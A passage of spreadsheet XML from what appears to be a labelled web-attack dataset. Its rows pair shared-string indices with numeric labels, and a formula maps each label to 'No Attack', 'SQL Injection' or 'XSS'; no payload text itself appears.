      </c>
      <c r="C15242" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15243" s="1" t="s">
        <v>15655</v>
      </c>
      <c r="B15243">
        <v>1</v>
      </c>
      <c r="C15243" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15244" s="1" t="s">
        <v>25541</v>
      </c>
      <c r="B15244">
        <v>1</v>
      </c>
      <c r="C15244" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15245" s="1" t="s">
        <v>15088</v>
      </c>
      <c r="B15245">
        <v>1</v>
      </c>
      <c r="C15245" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15246" s="1" t="s">
        <v>12961</v>
      </c>
      <c r="B15246">
        <v>1</v>
      </c>
      <c r="C15246" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15247" s="1" t="s">
        <v>19369</v>
      </c>
      <c r="B15247">
        <v>1</v>
      </c>
      <c r="C15247" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15248" s="1" t="s">
        <v>17796</v>
      </c>
      <c r="B15248">
        <v>1</v>
      </c>
      <c r="C15248" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15249" s="1" t="s">
        <v>13752</v>
      </c>
      <c r="B15249">
        <v>1</v>
      </c>
      <c r="C15249" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15250" s="1" t="s">
        <v>14607</v>
      </c>
      <c r="B15250">
        <v>1</v>
      </c>
      <c r="C15250" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15251" s="1" t="s">
        <v>24679</v>
      </c>
      <c r="B15251">
        <v>1</v>
      </c>
      <c r="C15251" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15252" s="1" t="s">
        <v>15897</v>
      </c>
      <c r="B15252">
        <v>1</v>
      </c>
      <c r="C15252" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15253" s="1" t="s">
        <v>15276</v>
      </c>
      <c r="B15253">
        <v>1</v>
      </c>
      <c r="C15253" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15254" s="1" t="s">
        <v>16670</v>
      </c>
      <c r="B15254">
        <v>1</v>
      </c>
      <c r="C15254" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15255" s="1" t="s">
        <v>17848</v>
      </c>
      <c r="B15255">
        <v>1</v>
      </c>
      <c r="C15255" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15256" s="1" t="s">
        <v>13440</v>
      </c>
      <c r="B15256">
        <v>1</v>
      </c>
      <c r="C15256" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15257" s="1" t="s">
        <v>15120</v>
      </c>
      <c r="B15257">
        <v>1</v>
      </c>
      <c r="C15257" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15258" s="1" t="s">
        <v>17208</v>
      </c>
      <c r="B15258">
        <v>1</v>
      </c>
      <c r="C15258" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15259" s="1" t="s">
        <v>15988</v>
      </c>
      <c r="B15259">
        <v>1</v>
      </c>
      <c r="C15259" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15260" s="1" t="s">
        <v>19188</v>
      </c>
      <c r="B15260">
        <v>1</v>
      </c>
      <c r="C15260" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15261" s="1" t="s">
        <v>24660</v>
      </c>
      <c r="B15261">
        <v>1</v>
      </c>
      <c r="C15261" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15262" s="1" t="s">
        <v>14657</v>
      </c>
      <c r="B15262">
        <v>1</v>
      </c>
      <c r="C15262" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15263" s="1" t="s">
        <v>24747</v>
      </c>
      <c r="B15263">
        <v>1</v>
      </c>
      <c r="C15263" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15264" s="1" t="s">
        <v>25478</v>
      </c>
      <c r="B15264">
        <v>1</v>
      </c>
      <c r="C15264" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15265" s="1" t="s">
        <v>24619</v>
      </c>
      <c r="B15265">
        <v>1</v>
      </c>
      <c r="C15265" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15266" s="1" t="s">
        <v>17775</v>
      </c>
      <c r="B15266">
        <v>1</v>
      </c>
      <c r="C15266" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15267" s="1" t="s">
        <v>12188</v>
      </c>
      <c r="B15267">
        <v>1</v>
      </c>
      <c r="C15267" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15268" s="1" t="s">
        <v>14980</v>
      </c>
      <c r="B15268">
        <v>1</v>
      </c>
      <c r="C15268" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15269" s="1" t="s">
        <v>1358</v>
      </c>
      <c r="B15269">
        <v>1</v>
      </c>
      <c r="C15269" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15270" s="1" t="s">
        <v>26301</v>
      </c>
      <c r="B15270">
        <v>1</v>
      </c>
      <c r="C15270" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15271" s="1" t="s">
        <v>16443</v>
      </c>
      <c r="B15271">
        <v>1</v>
      </c>
      <c r="C15271" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15272" s="1" t="s">
        <v>18329</v>
      </c>
      <c r="B15272">
        <v>1</v>
      </c>
      <c r="C15272" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15273" s="1" t="s">
        <v>16300</v>
      </c>
      <c r="B15273">
        <v>1</v>
      </c>
      <c r="C15273" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15274" s="1" t="s">
        <v>26705</v>
      </c>
      <c r="B15274">
        <v>1</v>
      </c>
      <c r="C15274" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15275" s="1" t="s">
        <v>24454</v>
      </c>
      <c r="B15275">
        <v>1</v>
      </c>
      <c r="C15275" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15276" s="1" t="s">
        <v>15397</v>
      </c>
      <c r="B15276">
        <v>1</v>
      </c>
      <c r="C15276" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15277" s="1" t="s">
        <v>26412</v>
      </c>
      <c r="B15277">
        <v>1</v>
      </c>
      <c r="C15277" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15278" s="1" t="s">
        <v>17522</v>
      </c>
      <c r="B15278">
        <v>1</v>
      </c>
      <c r="C15278" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15279" s="1" t="s">
        <v>24714</v>
      </c>
      <c r="B15279">
        <v>1</v>
      </c>
      <c r="C15279" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15280" s="1" t="s">
        <v>14047</v>
      </c>
      <c r="B15280">
        <v>1</v>
      </c>
      <c r="C15280" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15281" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15281" s="1" t="s">
        <v>12287</v>
      </c>
      <c r="B15281">
        <v>1</v>
      </c>
      <c r="C15281" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15282" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15282" s="1" t="s">
        <v>20022</v>
      </c>
      <c r="B15282">
        <v>1</v>
      </c>
      <c r="C15282" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15283" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15283" s="1" t="s">
        <v>15314</v>
      </c>
      <c r="B15283">
        <v>1</v>
      </c>
      <c r="C15283" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15284" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15284" s="1" t="s">
        <v>24853</v>
      </c>
      <c r="B15284">
        <v>1</v>
      </c>
      <c r="C15284" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15285" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15285" s="1" t="s">
        <v>24937</v>
      </c>
      <c r="B15285">
        <v>1</v>
      </c>
      <c r="C15285" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15286" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15286" s="1" t="s">
        <v>26716</v>
      </c>
      <c r="B15286">
        <v>1</v>
      </c>
      <c r="C15286" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15287" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15287" s="1" t="s">
        <v>19091</v>
      </c>
      <c r="B15287">
        <v>1</v>
      </c>
      <c r="C15287" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15288" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15288" s="1" t="s">
        <v>18323</v>
      </c>
      <c r="B15288">
        <v>1</v>
      </c>
      <c r="C15288" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15289" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15289" s="1" t="s">
        <v>14120</v>
      </c>
      <c r="B15289">
        <v>1</v>
      </c>
      <c r="C15289" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15290" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15290" s="1" t="s">
        <v>12375</v>
      </c>
      <c r="B15290">
        <v>1</v>
      </c>
      <c r="C15290" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15291" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15291" s="1" t="s">
        <v>13597</v>
      </c>
      <c r="B15291">
        <v>1</v>
      </c>
      <c r="C15291" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15292" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15292" s="1" t="s">
        <v>14133</v>
      </c>
      <c r="B15292">
        <v>1</v>
      </c>
      <c r="C15292" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15293" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15293" s="1" t="s">
        <v>13195</v>
      </c>
      <c r="B15293">
        <v>1</v>
      </c>
      <c r="C15293" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15294" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15294" s="1" t="s">
        <v>24536</v>
      </c>
      <c r="B15294">
        <v>1</v>
      </c>
      <c r="C15294" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15295" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15295" s="1" t="s">
        <v>18640</v>
      </c>
      <c r="B15295">
        <v>1</v>
      </c>
      <c r="C15295" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15296" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15296" s="1" t="s">
        <v>12725</v>
      </c>
      <c r="B15296">
        <v>1</v>
      </c>
      <c r="C15296" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15297" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15297" s="1" t="s">
        <v>12580</v>
      </c>
      <c r="B15297">
        <v>1</v>
      </c>
      <c r="C15297" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15298" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15298" s="1" t="s">
        <v>18311</v>
      </c>
      <c r="B15298">
        <v>1</v>
      </c>
      <c r="C15298" s="7" t="str">
        <f t="shared" si="238"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15299" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15299" s="1" t="s">
        <v>14233</v>
      </c>
      <c r="B15299">
        <v>1</v>
      </c>
      <c r="C15299" s="7" t="str">
        <f t="shared" ref="C15299:C15362" si="239">IF(B15299=0,"No Attack", IF(B15299=1, "SQL Injection", "XSS") )</f>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15300" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15300" s="1" t="s">
        <v>19219</v>
      </c>
      <c r="B15300">
        <v>1</v>
      </c>
      <c r="C15300" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15301" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15301" s="1" t="s">
        <v>12603</v>
      </c>
      <c r="B15301">
        <v>1</v>
      </c>
      <c r="C15301" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15302" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15302" s="1" t="s">
        <v>12289</v>
      </c>
      <c r="B15302">
        <v>1</v>
      </c>
      <c r="C15302" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15303" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15303" s="1" t="s">
        <v>14868</v>
      </c>
      <c r="B15303">
        <v>1</v>
      </c>
      <c r="C15303" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15304" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15304" s="1" t="s">
        <v>14949</v>
      </c>
      <c r="B15304">
        <v>1</v>
      </c>
      <c r="C15304" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15305" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15305" s="1" t="s">
        <v>13135</v>
      </c>
      <c r="B15305">
        <v>1</v>
      </c>
      <c r="C15305" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15306" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15306" s="1" t="s">
        <v>25032</v>
      </c>
      <c r="B15306">
        <v>1</v>
      </c>
      <c r="C15306" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15307" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15307" s="1" t="s">
        <v>14281</v>
      </c>
      <c r="B15307">
        <v>1</v>
      </c>
      <c r="C15307" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15308" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15308" s="1" t="s">
        <v>19890</v>
      </c>
      <c r="B15308">
        <v>1</v>
      </c>
      <c r="C15308" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15309" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15309" s="1" t="s">
        <v>15900</v>
      </c>
      <c r="B15309">
        <v>1</v>
      </c>
      <c r="C15309" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15310" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15310" s="1" t="s">
        <v>15372</v>
      </c>
      <c r="B15310">
        <v>1</v>
      </c>
      <c r="C15310" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15311" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15311" s="1" t="s">
        <v>11305</v>
      </c>
      <c r="B15311">
        <v>1</v>
      </c>
      <c r="C15311" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15312" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15312" s="1" t="s">
        <v>12913</v>
      </c>
      <c r="B15312">
        <v>1</v>
      </c>
      <c r="C15312" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15313" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15313" s="1" t="s">
        <v>25443</v>
      </c>
      <c r="B15313">
        <v>1</v>
      </c>
      <c r="C15313" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15314" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15314" s="1" t="s">
        <v>19258</v>
      </c>
      <c r="B15314">
        <v>1</v>
      </c>
      <c r="C15314" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15315" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15315" s="1" t="s">
        <v>17691</v>
      </c>
      <c r="B15315">
        <v>1</v>
      </c>
      <c r="C15315" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15316" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15316" s="1" t="s">
        <v>15042</v>
      </c>
      <c r="B15316">
        <v>1</v>
      </c>
      <c r="C15316" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15317" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15317" s="1" t="s">
        <v>13477</v>
      </c>
      <c r="B15317">
        <v>1</v>
      </c>
      <c r="C15317" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15318" spans="1:3" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A15318" s="1" t="s">
        <v>12465</v>
      </c>
      <c r="B15318">
        <v>1</v>
      </c>
      <c r="C15318" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15319" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15319" s="1" t="s">
        <v>1337</v>
      </c>
      <c r="B15319">
        <v>1</v>
      </c>
      <c r="C15319" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15320" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15320" s="1" t="s">
        <v>16093</v>
      </c>
      <c r="B15320">
        <v>1</v>
      </c>
      <c r="C15320" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15321" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15321" s="1" t="s">
        <v>13849</v>
      </c>
      <c r="B15321">
        <v>1</v>
      </c>
      <c r="C15321" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15322" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15322" s="1" t="s">
        <v>14449</v>
      </c>
      <c r="B15322">
        <v>1</v>
      </c>
      <c r="C15322" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15323" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15323" s="1" t="s">
        <v>12490</v>
      </c>
      <c r="B15323">
        <v>1</v>
      </c>
      <c r="C15323" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15324" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15324" s="1" t="s">
        <v>13370</v>
      </c>
      <c r="B15324">
        <v>1</v>
      </c>
      <c r="C15324" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15325" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15325" s="1" t="s">
        <v>25999</v>
      </c>
      <c r="B15325">
        <v>1</v>
      </c>
      <c r="C15325" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15326" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15326" s="1" t="s">
        <v>13560</v>
      </c>
      <c r="B15326">
        <v>1</v>
      </c>
      <c r="C15326" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15327" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15327" s="1" t="s">
        <v>17834</v>
      </c>
      <c r="B15327">
        <v>1</v>
      </c>
      <c r="C15327" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15328" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15328" s="1" t="s">
        <v>19353</v>
      </c>
      <c r="B15328">
        <v>1</v>
      </c>
      <c r="C15328" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15329" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15329" s="1" t="s">
        <v>12753</v>
      </c>
      <c r="B15329">
        <v>1</v>
      </c>
      <c r="C15329" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15330" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15330" s="1" t="s">
        <v>26383</v>
      </c>
      <c r="B15330">
        <v>1</v>
      </c>
      <c r="C15330" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15331" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15331" s="1" t="s">
        <v>26028</v>
      </c>
      <c r="B15331">
        <v>1</v>
      </c>
      <c r="C15331" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15332" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15332" s="1" t="s">
        <v>18355</v>
      </c>
      <c r="B15332">
        <v>1</v>
      </c>
      <c r="C15332" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15333" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15333" s="1" t="s">
        <v>13425</v>
      </c>
      <c r="B15333">
        <v>1</v>
      </c>
      <c r="C15333" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15334" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15334" s="1" t="s">
        <v>12347</v>
      </c>
      <c r="B15334">
        <v>1</v>
      </c>
      <c r="C15334" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15335" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15335" s="1" t="s">
        <v>19456</v>
      </c>
      <c r="B15335">
        <v>1</v>
      </c>
      <c r="C15335" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15336" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15336" s="1" t="s">
        <v>19190</v>
      </c>
      <c r="B15336">
        <v>1</v>
      </c>
      <c r="C15336" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15337" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15337" s="1" t="s">
        <v>18423</v>
      </c>
      <c r="B15337">
        <v>1</v>
      </c>
      <c r="C15337" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15338" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15338" s="1" t="s">
        <v>13462</v>
      </c>
      <c r="B15338">
        <v>1</v>
      </c>
      <c r="C15338" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15339" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15339" s="1" t="s">
        <v>19665</v>
      </c>
      <c r="B15339">
        <v>1</v>
      </c>
      <c r="C15339" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15340" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15340" s="1" t="s">
        <v>9046</v>
      </c>
      <c r="B15340">
        <v>0</v>
      </c>
      <c r="C15340" s="7" t="str">
        <f t="shared" si="239"/>
        <v>No Attack</v>
      </c>
    </row>
    <row r="15341" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15341" s="1" t="s">
        <v>19911</v>
      </c>
      <c r="B15341">
        <v>1</v>
      </c>
      <c r="C15341" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15342" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15342" s="1" t="s">
        <v>13065</v>
      </c>
      <c r="B15342">
        <v>1</v>
      </c>
      <c r="C15342" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15343" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15343" s="1" t="s">
        <v>13619</v>
      </c>
      <c r="B15343">
        <v>1</v>
      </c>
      <c r="C15343" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15344" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15344" s="1" t="s">
        <v>18647</v>
      </c>
      <c r="B15344">
        <v>1</v>
      </c>
      <c r="C15344" s="7" t="str">
        <f t="shared" si="239"/>
        <v>SQL Injection</v>
      </c>
    </row>
    <row r="15345" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A15345" s="1" t="s">
